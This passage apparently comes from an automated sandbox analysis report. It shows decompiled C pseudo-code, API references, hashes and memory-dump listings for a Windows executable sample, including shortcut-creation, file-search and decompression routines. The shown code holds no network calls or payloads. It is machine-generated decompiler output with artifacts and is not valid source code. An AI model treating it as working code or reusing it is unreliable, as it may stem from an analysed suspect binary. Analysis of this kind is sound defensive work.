                                                                                    				intOrPtr* _t52;
                                                                                    				intOrPtr* _t54;
                                                                                    				signed int _t58;
                                                                                    				intOrPtr* _t59;
                                                                                    				intOrPtr* _t62;
                                                                                    				intOrPtr* _t64;
                                                                                    				intOrPtr* _t66;
                                                                                    				intOrPtr* _t69;
                                                                                    				intOrPtr* _t71;
                                                                                    				int _t75;
                                                                                    				signed int _t81;
                                                                                    				intOrPtr* _t88;
                                                                                    				void* _t95;
                                                                                    				void* _t96;
                                                                                    				void* _t100;
                                                                                    
                                                                                    				 *(_t100 - 0x30) = E00402A29(0xfffffff0);
                                                                                    				_t96 = E00402A29(0xffffffdf);
                                                                                    				 *((intOrPtr*)(_t100 - 0x34)) = E00402A29(2);
                                                                                    				 *((intOrPtr*)(_t100 - 0xc)) = E00402A29(0xffffffcd);
                                                                                    				 *((intOrPtr*)(_t100 - 0x38)) = E00402A29(0x45);
                                                                                    				if(E00405727(_t96) == 0) {
                                                                                    					E00402A29(0x21);
                                                                                    				}
                                                                                    				_t44 = _t100 + 8;
                                                                                    				__imp__CoCreateInstance(0x407504, _t75, 1, 0x4074f4, _t44);
                                                                                    				if(_t44 < _t75) {
                                                                                    					L13:
                                                                                    					 *((intOrPtr*)(_t100 - 4)) = 1;
                                                                                    					_push(0xfffffff0);
                                                                                    				} else {
                                                                                    					_t48 =  *((intOrPtr*)(_t100 + 8));
                                                                                    					_t95 =  *((intOrPtr*)( *_t48))(_t48, 0x407514, _t100 - 8);
                                                                                    					if(_t95 >= _t75) {
                                                                                    						_t52 =  *((intOrPtr*)(_t100 + 8));
                                                                                    						_t95 =  *((intOrPtr*)( *_t52 + 0x50))(_t52, _t96);
                                                                                    						_t54 =  *((intOrPtr*)(_t100 + 8));
                                                                                    						 *((intOrPtr*)( *_t54 + 0x24))(_t54, 0x434800);
                                                                                    						_t81 =  *(_t100 - 0x18);
                                                                                    						_t58 = _t81 >> 0x00000008 & 0x000000ff;
                                                                                    						if(_t58 != 0) {
                                                                                    							_t88 =  *((intOrPtr*)(_t100 + 8));
                                                                                    							 *((intOrPtr*)( *_t88 + 0x3c))(_t88, _t58);
                                                                                    							_t81 =  *(_t100 - 0x18);
                                                                                    						}
                                                                                    						_t59 =  *((intOrPtr*)(_t100 + 8));
                                                                                    						 *((intOrPtr*)( *_t59 + 0x34))(_t59, _t81 >> 0x10);
                                                                                    						if( *((intOrPtr*)( *((intOrPtr*)(_t100 - 0xc)))) != _t75) {
                                                                                    							_t71 =  *((intOrPtr*)(_t100 + 8));
                                                                                    							 *((intOrPtr*)( *_t71 + 0x44))(_t71,  *((intOrPtr*)(_t100 - 0xc)),  *(_t100 - 0x18) & 0x000000ff);
                                                                                    						}
                                                                                    						_t62 =  *((intOrPtr*)(_t100 + 8));
                                                                                    						 *((intOrPtr*)( *_t62 + 0x2c))(_t62,  *((intOrPtr*)(_t100 - 0x34)));
                                                                                    						_t64 =  *((intOrPtr*)(_t100 + 8));
                                                                                    						 *((intOrPtr*)( *_t64 + 0x1c))(_t64,  *((intOrPtr*)(_t100 - 0x38)));
                                                                                    						if(_t95 >= _t75) {
                                                                                    							_t95 = 0x80004005;
                                                                                    							if(MultiByteToWideChar(_t75, _t75,  *(_t100 - 0x30), 0xffffffff, 0x409438, 0x400) != 0) {
                                                                                    								_t69 =  *((intOrPtr*)(_t100 - 8));
                                                                                    								_t95 =  *((intOrPtr*)( *_t69 + 0x18))(_t69, 0x409438, 1);
                                                                                    							}
                                                                                    						}
                                                                                    						_t66 =  *((intOrPtr*)(_t100 - 8));
                                                                                    						 *((intOrPtr*)( *_t66 + 8))(_t66);
                                                                                    					}
                                                                                    					_t50 =  *((intOrPtr*)(_t100 + 8));
                                                                                    					 *((intOrPtr*)( *_t50 + 8))(_t50);
                                                                                    					if(_t95 >= _t75) {
                                                                                    						_push(0xfffffff4);
                                                                                    					} else {
                                                                                    						goto L13;
                                                                                    					}
                                                                                    				}
                                                                                    				E00401423();
                                                                                    				 *0x42eca8 =  *0x42eca8 +  *((intOrPtr*)(_t100 - 4));
                                                                                    				return 0;
                                                                                    			}





















                                                                                    0x0040205c
                                                                                    0x00402066
                                                                                    0x0040206f
                                                                                    0x00402079
                                                                                    0x00402082
                                                                                    0x0040208c
                                                                                    0x00402090
                                                                                    0x00402090
                                                                                    0x00402095
                                                                                    0x004020a6
                                                                                    0x004020ae
                                                                                    0x0040218e
                                                                                    0x0040218e
                                                                                    0x00402195
                                                                                    0x004020b4
                                                                                    0x004020b4
                                                                                    0x004020c5
                                                                                    0x004020c9
                                                                                    0x004020cf
                                                                                    0x004020d9
                                                                                    0x004020db
                                                                                    0x004020e6
                                                                                    0x004020e9
                                                                                    0x004020f6
                                                                                    0x004020f8
                                                                                    0x004020fa
                                                                                    0x00402101
                                                                                    0x00402104
                                                                                    0x00402104
                                                                                    0x00402107
                                                                                    0x00402111
                                                                                    0x00402119
                                                                                    0x0040211e
                                                                                    0x0040212a
                                                                                    0x0040212a
                                                                                    0x0040212d
                                                                                    0x00402136
                                                                                    0x00402139
                                                                                    0x00402142
                                                                                    0x00402147
                                                                                    0x00402159
                                                                                    0x00402168
                                                                                    0x0040216a
                                                                                    0x00402176
                                                                                    0x00402176
                                                                                    0x00402168
                                                                                    0x00402178
                                                                                    0x0040217e
                                                                                    0x0040217e
                                                                                    0x00402181
                                                                                    0x00402187
                                                                                    0x0040218c
                                                                                    0x004021a1
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040218c
                                                                                    0x00402197
                                                                                    0x004028c1
                                                                                    0x004028cd

                                                                                    APIs
                                                                                    • CoCreateInstance.OLE32(00407504,?,00000001,004074F4,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 004020A6
                                                                                    • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,00409438,00000400,?,00000001,004074F4,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402160
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.222449800.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.222443832.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222477557.0000000000407000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222494200.0000000000409000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222512461.0000000000420000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222518421.000000000042C000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222524983.0000000000434000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222535001.0000000000437000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: ByteCharCreateInstanceMultiWide
                                                                                    • String ID:
                                                                                    • API String ID: 123533781-0
                                                                                    • Opcode ID: 0f4e10af4ab318a31e6fcfc6a713dc1191477b15d05add315443f5ab89249dcc
                                                                                    • Instruction ID: 8f67ba42191d57eba63015a6e8d0bffc44353c0eb35145c2afa1481ff4163fd5
                                                                                    • Opcode Fuzzy Hash: 0f4e10af4ab318a31e6fcfc6a713dc1191477b15d05add315443f5ab89249dcc
                                                                                    • Instruction Fuzzy Hash: 2D414C75A00205BFCB00DFA8CD89E9E7BB6EF49354F204169FA05EB2D1CA799C41CB94
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 39%
                                                                                    			E00402671(char __ebx, char* __edi, char* __esi) {
                                                                                    				void* _t19;
                                                                                    
                                                                                    				if(FindFirstFileA(E00402A29(2), _t19 - 0x19c) != 0xffffffff) {
                                                                                    					E00405B25(__edi, _t6);
                                                                                    					_push(_t19 - 0x170);
                                                                                    					_push(__esi);
                                                                                    					E00405BC7();
                                                                                    				} else {
                                                                                    					 *__edi = __ebx;
                                                                                    					 *__esi = __ebx;
                                                                                    					 *((intOrPtr*)(_t19 - 4)) = 1;
                                                                                    				}
                                                                                    				 *0x42eca8 =  *0x42eca8 +  *((intOrPtr*)(_t19 - 4));
                                                                                    				return 0;
                                                                                    			}




                                                                                    0x00402689
                                                                                    0x0040269d
                                                                                    0x004026a8
                                                                                    0x004026a9
                                                                                    0x004027e4
                                                                                    0x0040268b
                                                                                    0x0040268b
                                                                                    0x0040268d
                                                                                    0x0040268f
                                                                                    0x0040268f
                                                                                    0x004028c1
                                                                                    0x004028cd

                                                                                    APIs
                                                                                    • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 00402680
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.222449800.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.222443832.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222477557.0000000000407000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222494200.0000000000409000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222512461.0000000000420000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222518421.000000000042C000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222524983.0000000000434000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222535001.0000000000437000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: FileFindFirst
                                                                                    • String ID:
                                                                                    • API String ID: 1974802433-0
                                                                                    • Opcode ID: 210d19403dc9ad4312224203accd8d1f3ff27f6c6522c4c2c719f15252d079a4
                                                                                    • Instruction ID: d100cd6159f555773fbda265320c1ac67d2490096a0530dc8ee4140695772295
                                                                                    • Opcode Fuzzy Hash: 210d19403dc9ad4312224203accd8d1f3ff27f6c6522c4c2c719f15252d079a4
                                                                                    • Instruction Fuzzy Hash: 24F0A0326081049ED711EBA99A499EEB778DB11328F6045BFE101B61C1C7B859459A3A
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 79%
                                                                                    			E00406354(signed int __ebx, signed int* __esi) {
                                                                                    				signed int _t396;
                                                                                    				signed int _t425;
                                                                                    				signed int _t442;
                                                                                    				signed int _t443;
                                                                                    				signed int* _t446;
                                                                                    				void* _t448;
                                                                                    
                                                                                    				L0:
                                                                                    				while(1) {
                                                                                    					L0:
                                                                                    					_t446 = __esi;
                                                                                    					_t425 = __ebx;
                                                                                    					if( *(_t448 - 0x34) == 0) {
                                                                                    						break;
                                                                                    					}
                                                                                    					L55:
                                                                                    					__eax =  *(__ebp - 0x38);
                                                                                    					 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                                    					__ecx = __ebx;
                                                                                    					 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                    					 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                    					 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                                    					__ebx = __ebx + 8;
                                                                                    					while(1) {
                                                                                    						L56:
                                                                                    						if(__ebx < 0xe) {
                                                                                    							goto L0;
                                                                                    						}
                                                                                    						L57:
                                                                                    						__eax =  *(__ebp - 0x40);
                                                                                    						__eax =  *(__ebp - 0x40) & 0x00003fff;
                                                                                    						__ecx = __eax;
                                                                                    						__esi[1] = __eax;
                                                                                    						__ecx = __eax & 0x0000001f;
                                                                                    						if(__cl > 0x1d) {
                                                                                    							L9:
                                                                                    							_t443 = _t442 | 0xffffffff;
                                                                                    							 *_t446 = 0x11;
                                                                                    							L10:
                                                                                    							_t446[0x147] =  *(_t448 - 0x40);
                                                                                    							_t446[0x146] = _t425;
                                                                                    							( *(_t448 + 8))[1] =  *(_t448 - 0x34);
                                                                                    							L11:
                                                                                    							 *( *(_t448 + 8)) =  *(_t448 - 0x38);
                                                                                    							_t446[0x26ea] =  *(_t448 - 0x30);
                                                                                    							E00406AC3( *(_t448 + 8));
                                                                                    							return _t443;
                                                                                    						}
                                                                                    						L58:
                                                                                    						__eax = __eax & 0x000003e0;
                                                                                    						if(__eax > 0x3a0) {
                                                                                    							goto L9;
                                                                                    						}
                                                                                    						L59:
                                                                                    						 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 0xe;
                                                                                    						__ebx = __ebx - 0xe;
                                                                                    						_t94 =  &(__esi[2]);
                                                                                    						 *_t94 = __esi[2] & 0x00000000;
                                                                                    						 *__esi = 0xc;
                                                                                    						while(1) {
                                                                                    							L60:
                                                                                    							__esi[1] = __esi[1] >> 0xa;
                                                                                    							__eax = (__esi[1] >> 0xa) + 4;
                                                                                    							if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
                                                                                    								goto L68;
                                                                                    							}
                                                                                    							L61:
                                                                                    							while(1) {
                                                                                    								L64:
                                                                                    								if(__ebx >= 3) {
                                                                                    									break;
                                                                                    								}
                                                                                    								L62:
                                                                                    								if( *(__ebp - 0x34) == 0) {
                                                                                    									goto L182;
                                                                                    								}
                                                                                    								L63:
                                                                                    								__eax =  *(__ebp - 0x38);
                                                                                    								 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                                    								__ecx = __ebx;
                                                                                    								 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                    								 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                    								 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                                    								__ebx = __ebx + 8;
                                                                                    							}
                                                                                    							L65:
                                                                                    							__ecx = __esi[2];
                                                                                    							 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000007;
                                                                                    							__ebx = __ebx - 3;
                                                                                    							_t108 = __ecx + 0x4073e8; // 0x121110
                                                                                    							__ecx =  *_t108;
                                                                                    							 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 3;
                                                                                    							 *(__esi + 0xc +  *_t108 * 4) =  *(__ebp - 0x40) & 0x00000007;
                                                                                    							__ecx = __esi[1];
                                                                                    							__esi[2] = __esi[2] + 1;
                                                                                    							__eax = __esi[2];
                                                                                    							__esi[1] >> 0xa = (__esi[1] >> 0xa) + 4;
                                                                                    							if(__esi[2] < (__esi[1] >> 0xa) + 4) {
                                                                                    								goto L64;
                                                                                    							}
                                                                                    							L66:
                                                                                    							while(1) {
                                                                                    								L68:
                                                                                    								if(__esi[2] >= 0x13) {
                                                                                    									break;
                                                                                    								}
                                                                                    								L67:
                                                                                    								_t119 = __esi[2] + 0x4073e8; // 0x4000300
                                                                                    								__eax =  *_t119;
                                                                                    								 *(__esi + 0xc +  *_t119 * 4) =  *(__esi + 0xc +  *_t119 * 4) & 0x00000000;
                                                                                    								_t126 =  &(__esi[2]);
                                                                                    								 *_t126 = __esi[2] + 1;
                                                                                    							}
                                                                                    							L69:
                                                                                    							__ecx = __ebp - 8;
                                                                                    							__edi =  &(__esi[0x143]);
                                                                                    							 &(__esi[0x148]) =  &(__esi[0x144]);
                                                                                    							__eax = 0;
                                                                                    							 *(__ebp - 8) = 0;
                                                                                    							__eax =  &(__esi[3]);
                                                                                    							 *__edi = 7;
                                                                                    							__eax = E00406B2B( &(__esi[3]), 0x13, 0x13, 0, 0,  &(__esi[0x144]), __edi,  &(__esi[0x148]), __ebp - 8);
                                                                                    							if(__eax != 0) {
                                                                                    								L72:
                                                                                    								 *__esi = 0x11;
                                                                                    								while(1) {
                                                                                    									L180:
                                                                                    									_t396 =  *_t446;
                                                                                    									if(_t396 > 0xf) {
                                                                                    										break;
                                                                                    									}
                                                                                    									L1:
                                                                                    									switch( *((intOrPtr*)(_t396 * 4 +  &M00406A83))) {
                                                                                    										case 0:
                                                                                    											L101:
                                                                                    											__eax = __esi[4] & 0x000000ff;
                                                                                    											__esi[3] = __esi[4] & 0x000000ff;
                                                                                    											__eax = __esi[5];
                                                                                    											__esi[2] = __esi[5];
                                                                                    											 *__esi = 1;
                                                                                    											goto L102;
                                                                                    										case 1:
                                                                                    											L102:
                                                                                    											__eax = __esi[3];
                                                                                    											while(1) {
                                                                                    												L105:
                                                                                    												__eflags = __ebx - __eax;
                                                                                    												if(__ebx >= __eax) {
                                                                                    													break;
                                                                                    												}
                                                                                    												L103:
                                                                                    												__eflags =  *(__ebp - 0x34);
                                                                                    												if( *(__ebp - 0x34) == 0) {
                                                                                    													goto L182;
                                                                                    												}
                                                                                    												L104:
                                                                                    												__ecx =  *(__ebp - 0x38);
                                                                                    												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                                    												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                                                    												__ecx = __ebx;
                                                                                    												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                    												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                    												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                                    												__ebx = __ebx + 8;
                                                                                    												__eflags = __ebx;
                                                                                    											}
                                                                                    											L106:
                                                                                    											__eax =  *(0x409408 + __eax * 2) & 0x0000ffff;
                                                                                    											__eax = __eax &  *(__ebp - 0x40);
                                                                                    											__ecx = __esi[2];
                                                                                    											__eax = __esi[2] + __eax * 4;
                                                                                    											__ecx =  *(__eax + 1) & 0x000000ff;
                                                                                    											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                                                    											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
                                                                                    											__ecx =  *__eax & 0x000000ff;
                                                                                    											__eflags = __ecx;
                                                                                    											if(__ecx != 0) {
                                                                                    												L108:
                                                                                    												__eflags = __cl & 0x00000010;
                                                                                    												if((__cl & 0x00000010) == 0) {
                                                                                    													L110:
                                                                                    													__eflags = __cl & 0x00000040;
                                                                                    													if((__cl & 0x00000040) == 0) {
                                                                                    														goto L125;
                                                                                    													}
                                                                                    													L111:
                                                                                    													__eflags = __cl & 0x00000020;
                                                                                    													if((__cl & 0x00000020) == 0) {
                                                                                    														goto L9;
                                                                                    													}
                                                                                    													L112:
                                                                                    													 *__esi = 7;
                                                                                    													goto L180;
                                                                                    												}
                                                                                    												L109:
                                                                                    												__esi[2] = __ecx;
                                                                                    												__esi[1] = __eax;
                                                                                    												 *__esi = 2;
                                                                                    												goto L180;
                                                                                    											}
                                                                                    											L107:
                                                                                    											__esi[2] = __eax;
                                                                                    											 *__esi = 6;
                                                                                    											goto L180;
                                                                                    										case 2:
                                                                                    											L113:
                                                                                    											__eax = __esi[2];
                                                                                    											while(1) {
                                                                                    												L116:
                                                                                    												__eflags = __ebx - __eax;
                                                                                    												if(__ebx >= __eax) {
                                                                                    													break;
                                                                                    												}
                                                                                    												L114:
                                                                                    												__eflags =  *(__ebp - 0x34);
                                                                                    												if( *(__ebp - 0x34) == 0) {
                                                                                    													goto L182;
                                                                                    												}
                                                                                    												L115:
                                                                                    												__ecx =  *(__ebp - 0x38);
                                                                                    												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                                    												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                                                    												__ecx = __ebx;
                                                                                    												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                    												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                    												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                                    												__ebx = __ebx + 8;
                                                                                    												__eflags = __ebx;
                                                                                    											}
                                                                                    											L117:
                                                                                    											 *(0x409408 + __eax * 2) & 0x0000ffff =  *(0x409408 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
                                                                                    											__esi[1] = __esi[1] + ( *(0x409408 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
                                                                                    											__ecx = __eax;
                                                                                    											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                                                    											__ebx = __ebx - __eax;
                                                                                    											__eflags = __ebx;
                                                                                    											__eax = __esi[4] & 0x000000ff;
                                                                                    											__esi[3] = __esi[4] & 0x000000ff;
                                                                                    											__eax = __esi[6];
                                                                                    											__esi[2] = __esi[6];
                                                                                    											 *__esi = 3;
                                                                                    											goto L118;
                                                                                    										case 3:
                                                                                    											L118:
                                                                                    											__eax = __esi[3];
                                                                                    											while(1) {
                                                                                    												L121:
                                                                                    												__eflags = __ebx - __eax;
                                                                                    												if(__ebx >= __eax) {
                                                                                    													break;
                                                                                    												}
                                                                                    												L119:
                                                                                    												__eflags =  *(__ebp - 0x34);
                                                                                    												if( *(__ebp - 0x34) == 0) {
                                                                                    													goto L182;
                                                                                    												}
                                                                                    												L120:
                                                                                    												__ecx =  *(__ebp - 0x38);
                                                                                    												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                                    												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                                                    												__ecx = __ebx;
                                                                                    												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                    												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                    												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                                    												__ebx = __ebx + 8;
                                                                                    												__eflags = __ebx;
                                                                                    											}
                                                                                    											L122:
                                                                                    											__eax =  *(0x409408 + __eax * 2) & 0x0000ffff;
                                                                                    											__eax = __eax &  *(__ebp - 0x40);
                                                                                    											__ecx = __esi[2];
                                                                                    											__eax = __esi[2] + __eax * 4;
                                                                                    											__ecx =  *(__eax + 1) & 0x000000ff;
                                                                                    											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                                                    											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
                                                                                    											__ecx =  *__eax & 0x000000ff;
                                                                                    											__eflags = __cl & 0x00000010;
                                                                                    											if((__cl & 0x00000010) == 0) {
                                                                                    												L124:
                                                                                    												__eflags = __cl & 0x00000040;
                                                                                    												if((__cl & 0x00000040) != 0) {
                                                                                    													goto L9;
                                                                                    												}
                                                                                    												L125:
                                                                                    												__esi[3] = __ecx;
                                                                                    												__ecx =  *(__eax + 2) & 0x0000ffff;
                                                                                    												__esi[2] = __eax;
                                                                                    												goto L180;
                                                                                    											}
                                                                                    											L123:
                                                                                    											__esi[2] = __ecx;
                                                                                    											__esi[3] = __eax;
                                                                                    											 *__esi = 4;
                                                                                    											goto L180;
                                                                                    										case 4:
                                                                                    											L126:
                                                                                    											__eax = __esi[2];
                                                                                    											while(1) {
                                                                                    												L129:
                                                                                    												__eflags = __ebx - __eax;
                                                                                    												if(__ebx >= __eax) {
                                                                                    													break;
                                                                                    												}
                                                                                    												L127:
                                                                                    												__eflags =  *(__ebp - 0x34);
                                                                                    												if( *(__ebp - 0x34) == 0) {
                                                                                    													goto L182;
                                                                                    												}
                                                                                    												L128:
                                                                                    												__ecx =  *(__ebp - 0x38);
                                                                                    												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                                    												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                                                    												__ecx = __ebx;
                                                                                    												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                    												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                    												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                                    												__ebx = __ebx + 8;
                                                                                    												__eflags = __ebx;
                                                                                    											}
                                                                                    											L130:
                                                                                    											 *(0x409408 + __eax * 2) & 0x0000ffff =  *(0x409408 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
                                                                                    											__esi[3] = __esi[3] + ( *(0x409408 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
                                                                                    											__ecx = __eax;
                                                                                    											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                                                    											__ebx = __ebx - __eax;
                                                                                    											__eflags = __ebx;
                                                                                    											 *__esi = 5;
                                                                                    											goto L131;
                                                                                    										case 5:
                                                                                    											L131:
                                                                                    											__eax =  *(__ebp - 0x30);
                                                                                    											__edx = __esi[3];
                                                                                    											__eax = __eax - __esi;
                                                                                    											__ecx = __eax - __esi - 0x1ba0;
                                                                                    											__eflags = __eax - __esi - 0x1ba0 - __edx;
                                                                                    											if(__eax - __esi - 0x1ba0 >= __edx) {
                                                                                    												__ecx = __eax;
                                                                                    												__ecx = __eax - __edx;
                                                                                    												__eflags = __ecx;
                                                                                    											} else {
                                                                                    												__esi[0x26e8] = __esi[0x26e8] - __edx;
                                                                                    												__ecx = __esi[0x26e8] - __edx - __esi;
                                                                                    												__ecx = __esi[0x26e8] - __edx - __esi + __eax - 0x1ba0;
                                                                                    											}
                                                                                    											__eflags = __esi[1];
                                                                                    											 *(__ebp - 0x20) = __ecx;
                                                                                    											if(__esi[1] != 0) {
                                                                                    												L135:
                                                                                    												__edi =  *(__ebp - 0x2c);
                                                                                    												do {
                                                                                    													L136:
                                                                                    													__eflags = __edi;
                                                                                    													if(__edi != 0) {
                                                                                    														goto L152;
                                                                                    													}
                                                                                    													L137:
                                                                                    													__edi = __esi[0x26e8];
                                                                                    													__eflags = __eax - __edi;
                                                                                    													if(__eax != __edi) {
                                                                                    														L143:
                                                                                    														__esi[0x26ea] = __eax;
                                                                                    														__eax = E00406AC3( *((intOrPtr*)(__ebp + 8)));
                                                                                    														__eax = __esi[0x26ea];
                                                                                    														__ecx = __esi[0x26e9];
                                                                                    														__eflags = __eax - __ecx;
                                                                                    														 *(__ebp - 0x30) = __eax;
                                                                                    														if(__eax >= __ecx) {
                                                                                    															__edi = __esi[0x26e8];
                                                                                    															__edi = __esi[0x26e8] - __eax;
                                                                                    															__eflags = __edi;
                                                                                    														} else {
                                                                                    															__ecx = __ecx - __eax;
                                                                                    															__edi = __ecx - __eax - 1;
                                                                                    														}
                                                                                    														__edx = __esi[0x26e8];
                                                                                    														__eflags = __eax - __edx;
                                                                                    														 *(__ebp - 8) = __edx;
                                                                                    														if(__eax == __edx) {
                                                                                    															__edx =  &(__esi[0x6e8]);
                                                                                    															__eflags = __ecx - __edx;
                                                                                    															if(__ecx != __edx) {
                                                                                    																__eax = __edx;
                                                                                    																__eflags = __eax - __ecx;
                                                                                    																 *(__ebp - 0x30) = __eax;
                                                                                    																if(__eax >= __ecx) {
                                                                                    																	__edi =  *(__ebp - 8);
                                                                                    																	__edi =  *(__ebp - 8) - __eax;
                                                                                    																	__eflags = __edi;
                                                                                    																} else {
                                                                                    																	__ecx = __ecx - __eax;
                                                                                    																	__edi = __ecx;
                                                                                    																}
                                                                                    															}
                                                                                    														}
                                                                                    														__eflags = __edi;
                                                                                    														if(__edi == 0) {
                                                                                    															goto L183;
                                                                                    														} else {
                                                                                    															goto L152;
                                                                                    														}
                                                                                    													}
                                                                                    													L138:
                                                                                    													__ecx = __esi[0x26e9];
                                                                                    													__edx =  &(__esi[0x6e8]);
                                                                                    													__eflags = __ecx - __edx;
                                                                                    													if(__ecx == __edx) {
                                                                                    														goto L143;
                                                                                    													}
                                                                                    													L139:
                                                                                    													__eax = __edx;
                                                                                    													__eflags = __eax - __ecx;
                                                                                    													if(__eax >= __ecx) {
                                                                                    														__edi = __edi - __eax;
                                                                                    														__eflags = __edi;
                                                                                    													} else {
                                                                                    														__ecx = __ecx - __eax;
                                                                                    														__edi = __ecx;
                                                                                    													}
                                                                                    													__eflags = __edi;
                                                                                    													if(__edi == 0) {
                                                                                    														goto L143;
                                                                                    													}
                                                                                    													L152:
                                                                                    													__ecx =  *(__ebp - 0x20);
                                                                                    													 *__eax =  *__ecx;
                                                                                    													__eax = __eax + 1;
                                                                                    													__ecx = __ecx + 1;
                                                                                    													__edi = __edi - 1;
                                                                                    													__eflags = __ecx - __esi[0x26e8];
                                                                                    													 *(__ebp - 0x30) = __eax;
                                                                                    													 *(__ebp - 0x20) = __ecx;
                                                                                    													 *(__ebp - 0x2c) = __edi;
                                                                                    													if(__ecx == __esi[0x26e8]) {
                                                                                    														__ecx =  &(__esi[0x6e8]);
                                                                                    														 *(__ebp - 0x20) =  &(__esi[0x6e8]);
                                                                                    													}
                                                                                    													_t357 =  &(__esi[1]);
                                                                                    													 *_t357 = __esi[1] - 1;
                                                                                    													__eflags =  *_t357;
                                                                                    												} while ( *_t357 != 0);
                                                                                    											}
                                                                                    											goto L23;
                                                                                    										case 6:
                                                                                    											L156:
                                                                                    											__eax =  *(__ebp - 0x2c);
                                                                                    											__edi =  *(__ebp - 0x30);
                                                                                    											__eflags = __eax;
                                                                                    											if(__eax != 0) {
                                                                                    												L172:
                                                                                    												__cl = __esi[2];
                                                                                    												 *__edi = __cl;
                                                                                    												__edi = __edi + 1;
                                                                                    												__eax = __eax - 1;
                                                                                    												 *(__ebp - 0x30) = __edi;
                                                                                    												 *(__ebp - 0x2c) = __eax;
                                                                                    												goto L23;
                                                                                    											}
                                                                                    											L157:
                                                                                    											__ecx = __esi[0x26e8];
                                                                                    											__eflags = __edi - __ecx;
                                                                                    											if(__edi != __ecx) {
                                                                                    												L163:
                                                                                    												__esi[0x26ea] = __edi;
                                                                                    												__eax = E00406AC3( *((intOrPtr*)(__ebp + 8)));
                                                                                    												__edi = __esi[0x26ea];
                                                                                    												__ecx = __esi[0x26e9];
                                                                                    												__eflags = __edi - __ecx;
                                                                                    												 *(__ebp - 0x30) = __edi;
                                                                                    												if(__edi >= __ecx) {
                                                                                    													__eax = __esi[0x26e8];
